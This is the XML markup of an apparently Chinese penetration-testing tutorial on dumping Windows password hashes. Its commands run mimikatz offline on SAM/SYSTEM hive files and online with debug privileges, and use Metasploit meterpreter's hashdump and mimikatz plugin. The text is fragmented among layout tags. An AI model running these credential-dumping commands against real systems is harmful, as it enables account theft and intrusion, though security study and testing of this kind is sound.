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113.400pt;margin-top:295.200pt;width:7.800pt;height:7.20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603" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>上一季下载sys.hiv,sam.hiv,security.hiv文件后，以Linux下为背景来离线提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取hash，本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季补充以windows为背景离线提取ha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sh。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603" w:right="4073" w:firstLine="0"/>
      </w:pP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mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-35"/>
        </w:rPr>
        <w:t> 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2.0二进制文件下载地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://github.com/gentilkiwi/m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>imikatz/releases/latest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切到当下目录（注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意X86,X64位）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="2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mimikatz</w:t>
      </w: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离线导hash命令：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2790" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mimikatz.exe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de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"lsadump::sam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de3f29"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/system:sys.hiv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de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/sam:sam.hiv"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de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exit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4.600pt;margin-top:48.600pt;width:467.400pt;height:571.799pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:113.500pt;margin-top:689.500pt;width:5.500pt;height:5.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2270,13790" coordsize="110,110">
        <v:shape style="position:absolute;left:2270;top:13790;width:110;height:110" coordorigin="2270,13790" coordsize="110,110" path="m2380,13861l2380,13861,2380,13862,2380,13862,2380,13863,2380,13864,2380,13865,2380,13865,2380,13866,2380,13867,2380,13868,2380,13868,2380,13869,2380,13870,2380,13870,2380,13871,2379,13872,2379,13872,2379,13873,2379,13874,2379,13874,2379,13875,2379,13875,2379,13876,2379,13877,2378,13877,2378,13878,2378,13879,2378,13879,2378,13880,2378,13880,2377,13881,2377,13881,2377,13882,2377,13882,2377,13883,2376,13884,2376,13884,2376,13885,2376,13885,2375,13886,2375,13886,2375,13887,2375,13887,2374,13888,2374,13888,2374,13889,2373,13889,2373,13890,2373,13890,2373,13890,2372,13891,2372,13891,2372,13892,2371,13892,2371,13893,2371,13893,2370,13893,2370,13894,2370,13894,2369,13895,2369,13895,2368,13895,2368,13896,2368,13896,2367,13896,2367,13897,2366,13897,2366,13897,2365,13898,2365,13898,2365,13898,2364,13899,2364,13899,2363,13899,2363,13900,2362,13900,2362,13900,2361,13900,2361,13901,2360,13901,2360,13901,2359,13901,2359,13902,2358,13902,2358,13902,2357,13902,2357,13903,2356,13903,2356,13903,2355,13903,2354,13903,2354,13904,2353,13904,2353,13904,2352,13904,2352,13904,2351,13904,2350,13904,2350,13905,2349,13905,2348,13905,2348,13905,2347,13905,2346,13905,2346,13905,2345,13905,2344,13905,2344,13906,2343,13906,2342,13906,2342,13906,2341,13906,2340,13906,2340,13906,2339,13906,2338,13906,2337,13906,2337,13906,2336,13906,2335,13906,2335,13906,2334,13906,2334,13906,2333,13906,2332,13906,2331,13906,2331,13906,2330,13906,2329,13906,2329,13906,2328,13906,2327,13906,2327,13906,2326,13905,2325,13905,2325,13905,2324,13905,2323,13905,2323,13905,2322,13905,2321,13905,2321,13905,2320,13904,2319,13904,2319,13904,2318,13904,2318,13904,2317,13904,2316,13904,2316,13903,2315,13903,2315,13903,2314,13903,2314,13903,2313,13902,2313,13902,2312,13902,2312,13902,2311,13901,2311,13901,2310,13901,2309,13901,2309,13900,2309,13900,2308,13900,2308,13900,2307,13899,2307,13899,2306,13899,2306,13898,2305,13898,2305,13898,2304,13897,2304,13897,2304,13897,2303,13896,2303,13896,2302,13896,2302,13895,2302,13895,2301,13895,2301,13894,2300,13894,2300,13893,2300,13893,2299,13893,2299,13892,2299,13892,2298,13891,2298,13891,2298,13890,2297,13890,2297,13890,2297,13889,2297,13889,2296,13888,2296,13888,2296,13887,2295,13887,2295,13886,2295,13886,2295,13885,2295,13885,2294,13884,2294,13884,2294,13883,2294,13882,2293,13882,2293,13881,2293,13881,2293,13880,2293,13880,2292,13879,2292,13879,2292,13878,2292,13877,2292,13877,2292,13876,2292,13875,2291,13875,2291,13874,2291,13874,2291,13873,2291,13872,2291,13872,2291,13871,2291,13870,2291,13870,2291,13869,2290,13868,2290,13868,2290,13867,2290,13866,2290,13865,2290,13865,2290,13864,2290,13863,2290,13862,2290,13862,2290,13861,2290,13861,2290,13860,2290,13859,2290,13859,2290,13858,2290,13857,2290,13857,2290,13856,2290,13855,2290,13854,2290,13854,2291,13853,2291,13852,2291,13852,2291,13851,2291,13850,2291,13850,2291,13849,2291,13848,2291,13848,2291,13847,2292,13846,2292,13846,2292,13845,2292,13845,2292,13844,2292,13843,2292,13843,2293,13842,2293,13842,2293,13841,2293,13841,2293,13840,2294,13839,2294,13839,2294,13838,2294,13838,2295,13837,2295,13837,2295,13836,2295,13836,2295,13835,2296,13835,2296,13834,2296,13834,2297,13833,2297,13833,2297,13832,2297,13832,2298,13832,2298,13831,2298,13831,2299,13830,2299,13830,2299,13829,2300,13829,2300,13829,2300,13828,2301,13828,2301,13827,2302,13827,2302,13827,2302,13826,2303,13826,2303,13826,2304,13825,2304,13825,2304,13825,2305,13824,2305,13824,2306,13824,2306,13823,2307,13823,2307,13823,2308,13822,2308,13822,2309,13822,2309,13822,2309,13821,2310,13821,2311,13821,2311,13821,2312,13820,2312,13820,2313,13820,2313,13820,2314,13819,2314,13819,2315,13819,2315,13819,2316,13819,2316,13818,2317,13818,2318,13818,2318,13818,2319,13818,2319,13818,2320,13818,2321,13817,2321,13817,2322,13817,2323,13817,2323,13817,2324,13817,2325,13817,2325,13817,2326,13816,2327,13816,2327,13816,2328,13816,2329,13816,2329,13816,2330,13816,2331,13816,2331,13816,2332,13816,2333,13816,2334,13816,2334,13816,2335,13816,2335,13816,2336,13816,2337,13816,2337,13816,2338,13816,2339,13816,2340,13816,2340,13816,2341,13816,2342,13816,2342,13816,2343,13816,2344,13816,2344,13816,2345,13817,2346,13817,2346,13817,2347,13817,2348,13817,2348,13817,2349,13817,2350,13817,2350,13818,2351,13818,2352,13818,2352,13818,2353,13818,2353,13818,2354,13818,2354,13819,2355,13819,2356,13819,2356,13819,2357,13819,2357,13820,2358,13820,2358,13820,2359,13820,2359,13821,2360,13821,2360,13821,2361,13821,2361,13822,2362,13822,2362,13822,2363,13822,2363,13823,2364,13823,2364,13823,2365,13824,2365,13824,2365,13824,2366,13825,2366,13825,2367,13825,2367,13826,2368,13826,2368,13826,2368,13827,2369,13827,2369,13827,2370,13828,2370,13828,2370,13829,2371,13829,2371,13829,2371,13830,2372,13830,2372,13831,2372,13831,2373,13832,2373,13832,2373,13832,2373,13833,2374,13833,2374,13834,2374,13834,2375,13835,2375,13835,2375,13836,2375,13836,2376,13837,2376,13837,2376,13838,2376,13838,2377,13839,2377,13839,2377,13840,2377,13841,2377,13841,2378,13842,2378,13842,2378,13843,2378,13843,2378,13844,2378,13845,2379,13845,2379,13846,2379,13846,2379,13847,2379,13848,2379,13848,2379,13849,2379,13850,2379,13850,2380,13851,2380,13852,2380,13852,2380,13853,2380,13854,2380,13854,2380,13855,2380,13856,2380,13857,2380,13857,2380,13858,2380,13859,2380,13859,2380,13860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,2380,13861e x" fillcolor="#de3f29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603" w:right="0" w:firstLine="0"/>
      </w:pP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mimikatz</w:t>
      </w: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在线导hash命令：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spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="2790" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mimikatz.exe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de3f29"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"log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de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micropoor.txt"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de3f29"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"privilege::debug"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810" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"token::elevate"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"lsadump::sam"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de3f29"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"exit"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4.600pt;margin-top:48.600pt;width:467.400pt;height:567.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:698.400pt;width:467.400pt;height:91.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10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5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603" w:right="0" w:firstLine="0"/>
      </w:pP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当然关于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提取目标机的hash，msf也内置了离线提取与在线提取hash。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meterpreter下hashdump命令来提取hash（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注意当前权限）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4.600pt;margin-top:69.599pt;width:275.399pt;height:49.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:201.600pt;width:232.800pt;height:48.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:289.800pt;width:432.600pt;height:205.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:618.600pt;width:363.600pt;height:79.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:454.200pt;margin-top:746.400pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15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23" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1295" w:firstLine="483"/>
      </w:pP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msf同时也内置了mimikatz，meterpreter执行load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-49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mimikatz即可加载该插件。（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="23"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>里一定要注意，msf默认调用于payload位数相同的mimikatz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>）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603" w:right="0" w:firstLine="0"/>
      </w:pP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直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接执行kerberos即可。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88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603" w:right="0" w:firstLine="0"/>
      </w:pP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当然有些情况下，payload位数无误，权限无误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，依然无法提取目标机的密码相关。需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要调用mimi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katz自定义命令：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spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="1603" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mimikatz_command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sekurlsa::searchPasswords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93" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="245" w:lineRule="auto"/>
        <w:ind w:left="9599" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Micr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	<Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image/15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